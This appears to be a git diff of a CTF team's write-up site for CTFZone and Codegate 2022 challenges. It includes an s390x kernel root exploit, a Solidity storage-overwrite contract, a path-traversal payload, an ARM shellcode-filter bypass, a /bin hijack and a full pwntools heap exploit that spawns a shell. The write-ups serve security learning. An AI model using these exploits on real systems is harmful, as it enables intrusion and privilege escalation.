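To make the size budget concrete: `save_area_sync` holds eight 64-bit registers (r8 to r15), which is where the 64 bytes come from. Below is a minimal sketch of how assembled shellcode bytes could be split into the eight register values. The helper name `pack_into_registers` and the placeholder bytes are made up for illustration, and the sketch assumes s390x's big-endian byte order.

```python
import struct

SAVE_AREA_SYNC = 0x200  # lowcore offset of the saved r8..r15, as stated in the text
NUM_REGS = 8            # r8 .. r15
REG_SIZE = 8            # each register is 64 bits wide


def pack_into_registers(shellcode: bytes) -> dict:
    """Split shellcode into the values to load into r8..r15 (hypothetical helper)."""
    budget = NUM_REGS * REG_SIZE
    if len(shellcode) > budget:
        raise ValueError(f"shellcode is {len(shellcode)} bytes, budget is {budget}")
    # Zero padding decodes as an illegal instruction, so execution must never reach it
    padded = shellcode.ljust(budget, b"\x00")
    # Big-endian: the first shellcode byte becomes the most significant byte of r8
    values = struct.unpack(">8Q", padded)
    return {f"r{8 + i}": value for i, value in enumerate(values)}


placeholder = bytes(range(1, 41))  # 40 placeholder bytes, not real instructions
regs = pack_into_registers(placeholder)
for name, value in regs.items():
    print(f"{name} = {value:#018x}  (lands at {SAVE_AREA_SYNC + 8 * (int(name[1:]) - 8):#x})")
```

In the actual exploit the same effect is achieved in assembly by loading r8 to r15 with `lg` from a `shellcode` label before issuing the syscall.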
+
+The zero page even contains a pointer to the current task, and we can use that
+to find a pointer to our process's creds structure and zero the uid to get root.
+
+Here is the full exploit:
+
+```
+.section .text
+.globl _start
+.type _start, @function
+_start:
+ larl %r5, shellcode
+ lg %r8, 0(%r5)
+ lg %r9, 8(%r5)
+ lg %r10, 16(%r5)
+ lg %r11, 24(%r5)
+ lg %r12, 32(%r5)
+ lg %r13, 40(%r5)
+ lg %r14, 48(%r5)
+ lg %r15, 56(%r5)
+ lghi %r1, 390
+ lghi %r2, 0x200
+ svc 0
+
+userret:
+ # Launch a shell
+ lghi %r1, 11
+ larl %r2, binsh
+ larl %r3, binsh_argv
+ lghi %r4, 0
+ svc 11
+
+binsh:
+ .asciz "/bin/sh"
+
+binsh_argv:
+ .quad binsh
+ .quad 0
+
+.align 16
+shellcode:
+ lg %r12, 0x340
+ lg %r15, 0x348
+
+ # Zero the creds
+ lghi %r0, 0
+ lg %r1, 0x810(%r12)
+ stg %r0, 4(%r1)
+
+ # Return to userspace
+ lctlg %c1, %c1, 0x390
+ stpt 0x2C8
+ lpswe 0x200 + pswe - shellcode
+
+.align 16
+pswe:
+ # Copied from gdb
+ .quad 0x0705200180000000
+ .quad userret
+```
+
+Flag: `CTFZone{pls_only_l0wcor3_m3th0d_n0__nintend3d_kthxbye}`
\ No newline at end of file
diff --git a/Codegate-2022-quals/blockchain/ankiwoom.html b/Codegate-2022-quals/blockchain/ankiwoom.html
new file mode 100755
index 0000000..fcf97d2
--- /dev/null
+++ b/Codegate-2022-quals/blockchain/ankiwoom.html
@@ -0,0 +1,263 @@
+
+
+
+
+
+Ankiwoom Invest | Organisers
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
What do you think about if stock-exchange server is running on blockchain? Can you buy codegate stock?
+
+
service: nc 13.125.194.44 20000
+
+
rpc: http://13.125.194.44:8545
+
+
faucet: http://13.125.194.44:8080
+
+
network info: mainnet, petersburg
+
+
+
The info struct in the Proxy contract overlaps with the storage slot of the donaters dynamic array in the Investment contract. This means that whenever info is written, it overwrites the length of donaters, and hence we can achieve an out-of-bounds write. Observe that since the msg.sender address is written to the upper part of the length, we are likely to have enough reach to overwrite arbitrary interesting storage variables and in particular target our own balance.
+Since we need an “invalid” lastDonater when using modifyDonater, we have to make sure that the lastDonater slot contains the address of a contract and not a regular user address. That introduces the problem that we need to look like a regular address when performing the donation. To get around it, we can simply perform the setup and donation in the constructor of our contract, before we can be observed to have any nonzero extcodesize. Afterwards, we do the final steps from a regular contract function, so that the extcodesize is then no longer seen as 0.
+
+
After some calculation on the storage addresses, a lot of fighting with the RPC interaction, and hoping our contract address is large enough to span the gap, we get the flag.
+
+
Exploit contract:
+
import {Investment} from "./Investment.sol";
+import {Proxy} from "./Proxy.sol";
+
+contract Sploit {
+    Investment target;
+
+    constructor(Investment _t) {
+        target = _t;
+        target.init();
+        // Get some moneh
+        target.mint();
+        // Buy stonks to donate
+        target.buyStock("amd", 1);
+        // Donate so we have a contract lastDonater and can modifyDonater
+        // Do it in the constructor so somehow it seems like we're a user
+        target.donateStock(address(this), "amd", 1);
+    }
+    fallback() external payable {}
+
+    function continuesploit() public {
+        target.modifyDonater(1); // no clue if this was needed, probably not but I added it before the solution suddenly started to work ¯\_(ツ)_/¯
+
+        // Modify stuff, now we're a contract and no longer a user :)
+        uint256 base_address = uint256(keccak256(abi.encode(uint256(2)))); // donaters
+        uint256 mapping_slot = 7; // Balances
+        address mapping_key = address(this);
+        uint256 goal = uint256(keccak256(abi.encode(mapping_key, mapping_slot)));
+
+        require(goal > base_address, "Wrong overflow");
+
+        target.modifyDonater(goal - base_address);
+        target.buyStock("codegate", 1);
+        target.isSolved();
+    }
+}
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
diff --git a/Codegate-2022-quals/blockchain/ankiwoom.md b/Codegate-2022-quals/blockchain/ankiwoom.md
new file mode 100755
index 0000000..638aa7d
--- /dev/null
+++ b/Codegate-2022-quals/blockchain/ankiwoom.md
@@ -0,0 +1,63 @@
+# Ankiwoom Invest
+
+**Author**: Robin_Jadoul
+
+**Tags:** blockchain
+
+**Points:** 964 (11 solves)
+
+**Description:**
+
+> What do you think about if stock-exchange server is running on blockchain? Can you buy codegate stock?
+>
+> service: nc 13.125.194.44 20000
+>
+> rpc: http://13.125.194.44:8545
+>
+> faucet: http://13.125.194.44:8080
+>
+> network info: mainnet, petersburg
+
+The `info` struct in the `Proxy` contract overlaps with the storage slot of the `donaters` dynamic array in the `Investment` contract. This means that whenever `info` is written, it overwrites the length of `donaters`, and hence we can achieve an out-of-bounds write. Observe that since the `msg.sender` address is written to the upper part of the length, we are likely to have enough reach to overwrite arbitrary interesting storage variables and in particular target our own balance.
+Since we need an "invalid" `lastDonater` when using `modifyDonater`, we have to make sure that the `lastDonater` slot contains the address of a contract and not a regular user address. That introduces the problem that we need to look like a regular address when performing the donation. To get around it, we can simply perform the setup and donation in the constructor of our contract, before we can be observed to have any nonzero `extcodesize`. Afterwards, we do the final steps from a regular contract function, so that the `extcodesize` is then no longer seen as 0.
+
+After some calculation on the storage addresses, a lot of fighting with the RPC interaction, and hoping our contract address is large enough to span the gap, we get the flag.
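
The storage-address calculation can be sketched off-chain as follows. This is only an illustration of the slot arithmetic: the slot numbers 2 and 7 are taken from the exploit contract, one array element per storage slot is assumed, the attacker address is made up, and `stand_in_hash` is NOT Ethereum's Keccak-256 (Python's standard library only ships SHA3-256, which pads differently), so the printed numbers are not the real slots.

```python
import hashlib


def stand_in_hash(data: bytes) -> bytes:
    # ASSUMPTION: placeholder for keccak256. Swap in a real Keccak-256
    # implementation to obtain the slots the EVM would actually use.
    return hashlib.sha3_256(data).digest()


def word(value: int) -> bytes:
    """abi.encode of a single uint256 or address: left-padded to 32 bytes."""
    return value.to_bytes(32, "big")


def array_data_start(slot: int, h=stand_in_hash) -> int:
    """Element 0 of a dynamic array declared at `slot` lives at h(slot)."""
    return int.from_bytes(h(word(slot)), "big")


def mapping_value_slot(key: int, slot: int, h=stand_in_hash) -> int:
    """The value for `key` in a mapping declared at `slot` lives at h(key || slot)."""
    return int.from_bytes(h(word(key) + word(slot)), "big")


def donaters_index(attacker: int, array_slot: int = 2, mapping_slot: int = 7, h=stand_in_hash):
    """Index into donaters that aliases the attacker's balance, or None if unreachable."""
    base = array_data_start(array_slot, h)
    goal = mapping_value_slot(attacker, mapping_slot, h)
    # Mirrors require(goal > base_address, "Wrong overflow") in the contract
    return goal - base if goal > base else None


attacker = 0x1234567890ABCDEF1234567890ABCDEF12345678  # hypothetical contract address
print(donaters_index(attacker))
```

A `None` result corresponds to the "Wrong overflow" case, where the balance slot sits below the array data and a different contract address would be needed.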
+
+**Exploit contract:**
+```solidity
+import {Investment} from "./Investment.sol";
+import {Proxy} from "./Proxy.sol";
+
+contract Sploit {
+    Investment target;
+
+    constructor(Investment _t) {
+        target = _t;
+        target.init();
+        // Get some moneh
+        target.mint();
+        // Buy stonks to donate
+        target.buyStock("amd", 1);
+        // Donate so we have a contract lastDonater and can modifyDonater
+        // Do it in the constructor so somehow it seems like we're a user
+        target.donateStock(address(this), "amd", 1);
+    }
+    fallback() external payable {}
+
+    function continuesploit() public {
+        target.modifyDonater(1); // no clue if this was needed, probably not but I added it before the solution suddenly started to work ¯\_(ツ)_/¯
+
+        // Modify stuff, now we're a contract and no longer a user :)
+        uint256 base_address = uint256(keccak256(abi.encode(uint256(2)))); // donaters
+        uint256 mapping_slot = 7; // Balances
+        address mapping_key = address(this);
+        uint256 goal = uint256(keccak256(abi.encode(mapping_key, mapping_slot)));
+
+        require(goal > base_address, "Wrong overflow");
+
+        target.modifyDonater(goal - base_address);
+        target.buyStock("codegate", 1);
+        target.isSolved();
+    }
+}
+```
\ No newline at end of file
diff --git a/Codegate-2022-quals/blockchain/nft.html b/Codegate-2022-quals/blockchain/nft.html
new file mode 100755
index 0000000..0729ea4
--- /dev/null
+++ b/Codegate-2022-quals/blockchain/nft.html
@@ -0,0 +1,248 @@
+
+
+
+
+
+NFT | Organisers
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
This is mostly a web challenge with a bit of blockchain flavor. We observe that part of the token URI is directly fed into os.path.join after stripping away a prefix. Reading the documentation, we see that
+
+
+
If a component is an absolute path, all previous components are thrown away and joining continues from the absolute path component.
+
+
+
so we can get an absolute path out of it. The only obstacle remaining at this point is to find an IP address that:
+
+
+
starts with a digit but not a 0
+
doesn’t contain 127.0.0.1 or 0.0.0.0
+
but is equivalent to 127.0.0.1 or 0.0.0.0
+
+
+
To this end, we see that in the Python version used, the ipaddress module was still fairly naive. Unfortunately it didn’t allow e.g. a numeric IP, but on the flip side, it didn’t check for leading zeroes in octets yet either, so we can abuse that to use 127.0.0.01 as our IP instead and pass the checks.
+
+
To perform the actual exploit:
+
+
+
Create an account and login
+
Mint an NFT with tokenURI set to 127.0.0.01/account/storages//home/ctf/flag.txt with the private key of the account
+
visit the NFT listing for the account
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
diff --git a/Codegate-2022-quals/blockchain/nft.md b/Codegate-2022-quals/blockchain/nft.md
new file mode 100755
index 0000000..8e7666b
--- /dev/null
+++ b/Codegate-2022-quals/blockchain/nft.md
@@ -0,0 +1,41 @@
+# NFT
+
+**Author**: Robin_Jadoul
+
+**Tags:** blockchain
+
+**Points:** 907 (17 solves)
+
+**Description:**
+
+> NFT should work as having a deeply interaction with third-party like https://opensea.io/
+>
+> We all know that blockchain is opened to all, which give us some guaranty thus it will work as we expected, however can we trust all this things?
+>
+> contract: 0x4e2daa29B440EdA4c044b3422B990C718DF7391c
+>
+> service: http://13.124.97.208:1234
+>
+> rpc: http://13.124.97.208:8545/
+>
+> faucet: http://13.124.97.208:8080
+>
+> network info: mainnet, petersburg
+
+This is mostly a web challenge with a bit of blockchain flavor. We observe that part of the token URI is directly fed into `os.path.join` after stripping away a prefix. Reading [the documentation](https://docs.python.org/3/library/os.path.html#os.path.join), we see that
+
+> If a component is an absolute path, all previous components are thrown away and joining continues from the absolute path component.
+
+so we can get an absolute path out of it. The only obstacle remaining at this point is to find an IP address that:
+
+- starts with a digit but not a 0
+- doesn't contain `127.0.0.1` or `0.0.0.0`
+- but is equivalent to `127.0.0.1` or `0.0.0.0`
+
+To this end, we see that in the Python version used, the `ipaddress` module was still fairly naive. Unfortunately it didn't allow e.g. a numeric IP, but on the flip side, it didn't check for leading zeroes in octets yet either, so we can abuse that to use `127.0.0.01` as our IP instead and pass the checks.
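
Both ingredients can be checked locally with a small sketch. The `resolve` and `passes_filter` helpers, the storage directory and the exact prefix handling are guesses at what the server does, not its real code; `posixpath` is used instead of `os.path` so the result does not depend on the platform. The leading-zero behaviour of `ipaddress` is deliberately not exercised here because it depends on the Python version.

```python
import posixpath


def resolve(storage_dir: str, token_uri: str, prefix: str) -> str:
    """Hypothetical server logic: strip a known prefix, then join onto the storage dir."""
    rest = token_uri[len(prefix):]
    # An absolute component makes join() discard everything before it
    return posixpath.join(storage_dir, rest)


def passes_filter(host: str) -> bool:
    """The first two textual conditions from the list above."""
    starts_ok = host[0].isdigit() and host[0] != "0"
    no_banned = "127.0.0.1" not in host and "0.0.0.0" not in host
    return starts_ok and no_banned


PREFIX = "127.0.0.01/account/storages/"   # assumed prefix that gets stripped
STORAGE = "/srv/storages"                 # made-up storage directory

benign = resolve(STORAGE, PREFIX + "a.txt", PREFIX)
evil = resolve(STORAGE, PREFIX + "/home/ctf/flag.txt", PREFIX)
print(benign)
print(evil)
print(passes_filter("127.0.0.01"), passes_filter("127.0.0.1"))
```

The double slash in the token URI is what leaves an absolute path behind once the prefix is removed.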
+
+To perform the actual exploit:
+
+- Create an account and log in
+- Mint an NFT with tokenURI set to `127.0.0.01/account/storages//home/ctf/flag.txt` using the private key of the account
+- Visit the NFT listing for the account
\ No newline at end of file
diff --git a/Codegate-2022-quals/index.html b/Codegate-2022-quals/index.html
new file mode 100755
index 0000000..06914d5
--- /dev/null
+++ b/Codegate-2022-quals/index.html
@@ -0,0 +1,260 @@
+
+
+
+
+
+Codegate CTF 2022 Qualifiers | Organisers
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
Welcome! Here is my Emulator. It can use only human.
+
+
Always SMiLEY :)
+
+
+
This challenge is an ARM binary running in qemu-user. The challenge asks us to input up to 4k of ARM machine code, then gives us a choice between running the code, printing it, or replacing it with new code.
If the verification succeeds, the binary runs our shellcode.
+
+
The run function is presumably trying to prevent our shellcode from doing something fishy like launching a shell. However, I don’t know for sure because I didn’t actually reverse the checks.
+
+
Instead I noticed that the verification succeeds immediately when it encounters an instruction that encodes to 0. 0 is a valid ARM instruction that is essentially a nop (andeq r0, r0, r0). This means that we can easily bypass all the checks by prefixing our shellcode with this instruction.
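
As a quick sanity check of the claim that an all-zero word is `andeq r0, r0, r0`, here is a small sketch that decodes the plain three-register form of an ARM data-processing instruction and builds the prefixed payload. The decoder is intentionally incomplete (no shifts, no immediates, no S bit), the shellcode bytes are a placeholder, and little-endian encoding is assumed.

```python
import struct

COND = ["eq", "ne", "cs", "cc", "mi", "pl", "vs", "vc",
        "hi", "ls", "ge", "lt", "gt", "le", "al", "nv"]
OPCODES = ["and", "eor", "sub", "rsb", "add", "adc", "sbc", "rsc",
           "tst", "teq", "cmp", "cmn", "orr", "mov", "bic", "mvn"]


def decode_data_processing(insn: int) -> str:
    """Decode `op{cond} rd, rn, rm`; raise for any form this sketch does not handle."""
    if (insn >> 25) & 0b111 != 0:      # bits 27..25 must be 000 (register operand)
        raise ValueError("not a register-operand data-processing instruction")
    if (insn >> 4) & 0xFF != 0:        # bits 11..4 describe a shift; only 'none' is handled
        raise ValueError("shifted operands are not handled")
    if (insn >> 20) & 1:               # S bit
        raise ValueError("flag-setting forms are not handled")
    cond = COND[insn >> 28]
    opcode = OPCODES[(insn >> 21) & 0xF]
    rn, rd, rm = (insn >> 16) & 0xF, (insn >> 12) & 0xF, insn & 0xF
    return f"{opcode}{cond} r{rd}, r{rn}, r{rm}"


print(decode_data_processing(0x00000000))

shellcode = b"\xde\xad\xbe\xef"                 # placeholder, not real shellcode
payload = struct.pack("<I", 0) + shellcode      # zero word first, then the real code
print(payload.hex())
```

Because the zero flag's state only decides whether the `and` executes, and `r0 & r0` leaves `r0` unchanged either way, the prefix has no visible effect on the shellcode that follows.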
The challenge binary implements a virtual filesystem where you can create and manage
+“files” in memory through a console menu that smells like a heap challenge. The process
+forks right away and lets the child and parent process communicate through local sockets.
+The parent process provides the user interface, which lets the user explore the virtual
+filesystem and send “system calls” through to the child process, which keeps the actual
+list of virtual files.
+
+
Overview
+
After reversing both the parent and child processes, we come to the following vfile struct, which
+is created and filled with user-provided data in the client itself. The parent process
+always keeps one copy of a “selected” vfile in memory, whose metadata and file content can be
+changed before it is committed to the child process when asked to.
The client process opens a flag.v and README.md.v file on start and links them into a global
+doubly-linked list that the parent process can append files to and delete files from. The struct looks
+something like this, but we only needed the parent process for our exploit.
You can select and print that flag.v file through the client menu, but it only tells you to
+get a shell to read the real flag file.
+
+
The Bug
+
When editing a virtual file’s contents, the total_size field isn’t updated [1] but only the
+filesize field is [4]. Since the two fields were used in different contexts in the logic,
+the inconsistency first allowed us to leak a libc address.
When changing the content of an existing file like flag.v to some longer value and saving it
+to the child process, the total_size field is used to determine the size of the struct and
+thus truncates it on the child process. After loading the same file again, the smaller total_size
+is used to malloc a buffer for it. Printing the contents of a file uses the larger filesize field
+and leaks the heap memory after the vfile_format struct containing libc addresses.
+
+
To turn this into an arbitrary write primitive, we created a file with long content and a correct,
+large total_size, then edited the contents again to a smaller value. The binary mallocs a smaller
+chunk in [2], but still memcpys the whole old struct into the smaller buffer [3].
+This allowed us to overflow the heap buffer into another free tcache chunk we placed there
+through some heap feng shui. The target chunk had to be smaller than 0x100 in size, since we
+use the filename as a trigger, which had that size limit.
+
+
To actually fix up the total_size field after changing the contents we resorted to changing
+the filename, since that menu option recalculated and updated the total_size to match the
+set filesize:
Since we’re dealing with libc 2.27, which lacks tcache sanity checks, the plan was to plant
+__free_hook into the fd field of a free tcache chunk to let malloc return that address
+and overwrite it with a magic gadget to get a shell. A lot of the logic used calloc to
+allocate memory though, which doesn’t use the tcache. So many steps of the exploit dance
+around this limitation by using the few controllable malloc calls repeatedly.
+
+
+
+
+
+
+
diff --git a/Codegate-2022-quals/pwn/filev.md b/Codegate-2022-quals/pwn/filev.md
new file mode 100755
index 0000000..d95c3a5
--- /dev/null
+++ b/Codegate-2022-quals/pwn/filev.md
@@ -0,0 +1,316 @@
+# File-v
+
+**Authors**: Peace-Maker, pql
+
+**Tags:** pwn
+
+**Points:** 957 (12 solves)
+
+**Description:**
+
+> Thanks for using J-DRIVE!!!!
+
+The challenge binary implements a virtual filesystem where you can create and manage
+"files" in memory through a console menu that smells like a heap challenge. The process
+forks right away and lets the child and parent process communicate through local sockets.
+The parent process provides the user interface, which lets the user explore the virtual
+filesystem and send "system calls" through to the child process, which keeps the actual
+list of virtual files.
+
+#### Overview
+After reversing both the parent and child processes, we come to the following vfile struct, which
+is created and filled with user-provided data in the client itself. The parent process
+always keeps one copy of a "selected" vfile in memory, whose metadata and file content can be
+changed before it is committed to the child process when asked to.
+
+```c
+struct vfile_format
+{
+ unsigned int total_size; // filename_size + filesize + 25
+ unsigned int color_idx;
+ unsigned int created_time;
+ unsigned int modified_time;
+ unsigned int filename_size;
+ unsigned int filesize;
+ char filename[];
+};
+```
+
+The client process opens a `flag.v` and `README.md.v` file on start and links them into a global
+doubly-linked list that the parent process can append files to and delete files from. The struct looks
+something like this, but we only needed the parent process for our exploit.
+
+```c
+struct vfile
+{
+ struct vfile_format *data;
+ struct vfile *prev;
+ struct vfile *next;
+};
+```
+
+You can select and print that `flag.v` file through the client menu, but it only tells you to
+get a shell to read the real `flag` file.
+
+#### The Bug
+When editing a virtual file's contents, the `total_size` field isn't updated [1] but only the
+`filesize` field is [4]. Since the two fields were used in different contexts in the logic,
+the inconsistency first allowed us to leak a libc address.
+
+```c
+__printf_chk(1LL, "Enter content: ");
+new_content = read_line(filesize);
+total_size = selected_vfile->total_size; // [1]
+new_content2 = new_content;
+new_filestruct = (vfile_format *)malloc(selected_vfile->total_size - selected_vfile->filesize + filesize); // [2]
+memcpy(new_filestruct, selected_vfile, total_size); // [3]
+new_filestruct->modified_time = time(0LL);
+filename_size = new_filestruct->filename_size;
+new_filestruct->filesize = filesize; // [4]
+memcpy(&new_filestruct->filename[filename_size + 1], new_content2, filesize);
+free(selected_vfile);
+free(new_content2);
+```
+
+#### The Exploit
+When changing the content of an existing file like `flag.v` to some longer value and saving it
+to the child process, the `total_size` field is used to determine the size of the struct and
+thus truncates it on the child process. After loading the same file again, the smaller `total_size`
+is used to `malloc` a buffer for it. Printing the contents of a file uses the larger `filesize` field
+and leaks the heap memory after the `vfile_format` struct containing libc addresses.
+
+To turn this into an arbitrary write primitive, we created a file with long content and a correct,
+large `total_size`, then edited the contents again to a smaller value. The binary `malloc`s a smaller
+chunk in [2], but still `memcpy`s the whole old struct into the smaller buffer [3].
+This allowed us to overflow the heap buffer into another free tcache chunk we placed there
+through some heap feng shui. The target chunk had to be smaller than 0x100 in size, since we
+use the filename as a trigger, which had that size limit.
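
The size bookkeeping behind both the leak and the overflow can be modelled with a few lines of arithmetic. This is a sketch of the logic in the decompiled snippet only: the `VFileModel` class is made up, the initial sizes are hypothetical, and the second scenario borrows the sizes used for the `meh`/`ho` file in the exploit script, including the rename that this writeup uses to bring `total_size` back in sync.

```python
HEADER = 25  # from the struct comment: total_size = filename_size + filesize + 25


class VFileModel:
    """Tracks only the size fields of the parent's selected vfile (illustrative)."""

    def __init__(self, filename_size: int, filesize: int):
        self.filename_size = filename_size
        self.filesize = filesize
        self.total_size = filename_size + filesize + HEADER

    def change_content(self, new_size: int):
        """Return (bytes requested from malloc, bytes memcpy'd) for one content edit."""
        requested = self.total_size - self.filesize + new_size  # [2]
        copied = self.total_size                                 # [3]
        self.filesize = new_size                                 # [4]
        # total_size is copied over unchanged, so it is stale from here on  [1]
        return requested, copied

    def change_name(self, new_len: int):
        """Renaming recomputes total_size from the current filesize."""
        self.filename_size = new_len
        self.total_size = self.filesize + new_len + HEADER


# Leak: growing the content leaves total_size too small for the new filesize.
f = VFileModel(filename_size=4, filesize=16)   # hypothetical initial sizes
f.change_content(0x100)
over_read = (f.filename_size + f.filesize + HEADER) - f.total_size

# Overflow: shrink the content after a rename has made total_size large and correct.
g = VFileModel(filename_size=3, filesize=0)    # assumed state of a fresh file
g.change_content(0x400)
g.change_name(2)
requested, copied = g.change_content(0xD0 - 25 - 2 - 0x10)
overflow = copied - requested

print(over_read, hex(requested), overflow)
```

Under these assumptions the shrinking edit requests 0xc0 bytes, which would land in a 0xd0 chunk, while the `memcpy` still moves the full old struct.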
+
+To actually fix up the `total_size` field after changing the contents we resorted to changing
+the filename, since that menu option recalculated and updated the `total_size` to match the
+set `filesize`:
+
+```c
+total_size = file_data_struct->filesize + new_filename_len + 25;
+new_vfile = (vfile_format *)calloc(total_size, 1uLL);
+new_vfile->total_size = total_size;
+```
+
+Since we're dealing with libc 2.27, which lacks tcache sanity checks, the plan was to plant
+`__free_hook` into the `fd` field of a free tcache chunk to let `malloc` return that address
+and overwrite it with a magic gadget to get a shell. A lot of the logic used `calloc` to
+allocate memory though, which doesn't use the tcache. So many steps of the exploit dance
+around this limitation by using the few controllable `malloc` calls repeatedly.
+
+```python
+#!/usr/bin/env python3
+from pwn import *
+
+# context.terminal = ["terminator", "-e"]
+
+BINARY_NAME = "./file-v-new"
+LIBC_NAME = "./libc.so"
+REMOTE = ("3.36.184.9", 5555)
+
+context.binary = BINARY_NAME
+binary = context.binary
+libc = ELF(LIBC_NAME)
+
+EXEC_STR = [binary.path]
+
+PIE_ENABLED = binary.pie
+
+BREAKPOINTS = [int(x, 16) for x in args.BREAK.split(',')] if args.BREAK else []
+
+gdbscript_break = '\n'.join([f"brva {hex(x)}" for x in BREAKPOINTS])
+
+gdbscript = \
+ """
+ # GDBSCRIPT here
+ set follow-fork-mode parent
+ continue
+ """
+
+
+def handle():
+
+    env = {"LD_PRELOAD": libc.path}
+
+    if args.REMOTE:
+        return remote(*REMOTE)
+
+    elif args.LOCAL:
+        if args.GDB:
+            p = gdb.debug(EXEC_STR, env=env, gdbscript=gdbscript_break + gdbscript)
+        else:
+            p = process(EXEC_STR, env=env)
+    else:
+        error("No argument supplied.\nUsage: python exploit.py (REMOTE|LOCAL) [GDB] [STRACE]")
+
+    # if args.STRACE:
+    #     subprocess.Popen([*context.terminal, f"strace -p {p.pid}; cat"])
+    #     input("Waiting for enter...")
+
+    return p
+
+def recvmenu(l):
+    l.recvuntil(b"> ")
+
+
+def do_create_file(l, filename, filename_len=None):
+    recvmenu(l)
+
+    if filename_len is None:
+        filename_len = len(filename)
+
+    l.sendline(b'c')
+    l.sendlineafter(b"Enter the length of filename:", str(filename_len).encode())
+    l.sendlineafter(b"Enter filename: ", filename)
+
+def do_select_file(l, filename):
+    recvmenu(l)
+    l.sendline(b'b')
+    l.sendlineafter(b"Enter filename: ", filename)
+    response = l.recvline()
+    if response == b'Failed to find the file\n':
+        return None
+
+    l.recvuntil(b"Filename \t\t")
+    filename = l.recvuntil(b"\nSize \t\t", drop=True)
+    size = l.recvuntil(b"\nCreated Time\t\t", drop=True)
+    created_time = l.recvuntil(b"\nModified Time\t\t", drop=True)
+    modified_time = l.recvuntil(b"\n-------------------------------------------------------\n", drop=True)
+
+    return {
+        "filename": filename,
+        "size": size,
+        "created_time": created_time,
+        "modified_time": modified_time
+    }
+
+def select_do_change_name(l, filename, filename_size=None):
+    if filename_size is None:
+        filename_size = len(filename)
+
+    recvmenu(l)
+    l.sendline(b"1")
+    l.sendlineafter(b"Enter the length of filename: ", str(filename_size).encode())
+    l.sendafter(b"Enter filename: ", filename)
+
+def select_do_change_content(l, content, content_size=None):
+
+    if content_size is None:
+        content_size = len(content)
+
+    recvmenu(l)
+    l.sendline(b"4")
+    l.sendlineafter(b"Enter the size of content: ", str(content_size).encode())
+    l.sendafter(b"Enter content: ", content)
+
+def select_do_get_content(l):
+    recvmenu(l)
+    l.sendline(b"3")
+
+    results = bytearray(0)
+
+    while True:
+        l.recvuntil(b' | ')
+
+        bs = l.recvuntil(b'|', drop=True).decode().split(' ')[:-1]
+
+        if len(bs) == 0:
+            break
+
+        bs = bytearray(map(lambda x: bytes.fromhex(x)[0], bs))
+        results += bs
+
+        l.recvuntil(b'\n')
+
+    return results
+
+
+def select_do_save_changes(l):
+ recvmenu(l)
+ l.sendline(b'5')
+
+def select_do_back(l, save=False):
+ recvmenu(l)
+ l.sendline(b'b')
+ n = l.recvn(5)
+ # print('=====', n)
+ if n == b"Won't":
+ if save:
+ l.sendline(b'Y')
+ else:
+ l.sendline(b'N')
+
+def select_do_delete(l):
+ recvmenu(l)
+ l.sendline(b'd')
+
+def main():
+ l = handle()
+
+ l.recvuntil(b"-------------------------- MENU ---------------------------")
+
+ file = do_select_file(l, b"flag")
+ print(file)
+
+ select_do_change_content(l, b"A"*0x100)
+ select_do_save_changes(l)
+ select_do_back(l)
+
+ do_select_file(l, b"flag")
+
+ oobr = select_do_get_content(l)
+ # print(hexdump(oobr))
+
+ libc_leak = u64(oobr[0xab:0xab+8])
+ log.info('libc leak: %#x', libc_leak)
+ libc_base = libc_leak - 0x3ec680 # libc.sym._IO_2_1_stderr_
+ log.info("libc base: %#x", libc_base)
+ libc.address = libc_base
+
+ select_do_back(l)
+
+ do_create_file(l, b'H'*0xc0)
+ do_select_file(l, b'H'*0xc0)
+ select_do_change_content(l, cyclic(0xc0))
+ select_do_change_name(l, b'hi')
+ select_do_save_changes(l)
+ select_do_change_content(l, b'A'*0x130)
+ select_do_back(l)
+ log.info('heap groomed')
+
+ do_create_file(l, b'meh')
+ do_select_file(l, b'meh')
+ payload = fit({
+ 0xd0-39: p64(0x21) + b'/etc/localtime\x00',
+ 0xf0-39: p64(0xf1) + p64(0),
+ 0x1e0-39: p64(0x1b1) + p64(0),
+ 0x390-39: p64(0xf1) + p64(libc.sym.__free_hook),
+ }, length=0x400)
+ select_do_change_content(l, payload)
+ select_do_change_name(l, b'ho')
+ select_do_change_content(l, b'B'*(0xd0-25-2-0x10))
+ select_do_delete(l)
+ log.info('planted free_hook')
+
+ do_select_file(l, b'README.md')
+ select_do_change_name(l, b'W'*0xd0)
+ select_do_save_changes(l)
+ # select_do_back(l)
+ # select_do_delete(l)
+ one_gadget = libc_base + 0x10a41c # 0x4f3d5 0x4f432
+ select_do_change_name(l, p64(one_gadget).ljust(0xe0, b'\x00'))
+ log.success('enjoy your shell')
+ # select_do_save_changes(l)
+
+ l.sendline(b'id;cat f*;cat /home/ctf/f*')
+
+ l.interactive()
+
+
+if __name__ == "__main__":
+ main()
+```
\ No newline at end of file
diff --git a/Codegate-2022-quals/pwn/forgotten.html b/Codegate-2022-quals/pwn/forgotten.html
new file mode 100755
index 0000000..86e7f67
--- /dev/null
+++ b/Codegate-2022-quals/pwn/forgotten.html
@@ -0,0 +1,264 @@
+
+
+
+
+
+Forgotten | Organisers
+
The challenge files contain a Linux VM (kernel image + initramfs) and a customized Qemu. The Qemu patch is included and adds a custom PCI device. The challenge also includes a driver (1153 lines of C) for the custom device, which is built into the kernel. The flag is in the initramfs, and can only be read by root.
+
+
We have access to an unprivileged shell, and the intended solution is to become root by exploiting memory corruption in the custom driver.
+
+
Fortunately for us there is also a much easier way to solve this challenge:
+
+
Initialization is done. Enjoy :)
+/ $ ls -la
+...
+drwxrwxr-x 2 user user 0 Nov 22 07:37 bin
+...
+
+
+
The /bin directory is owned by our user 👀. It appears that the author has… forgotten… to change the owner of some directories to root. That means that we can delete and create files there. At boot the VM executes the following init script as root:
The script invokes umount (/bin/umount) and poweroff (/bin/poweroff) as root after our unprivileged shell exits. Since we own /bin, we can simply delete /bin/umount and replace it with a script that prints the flag.
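
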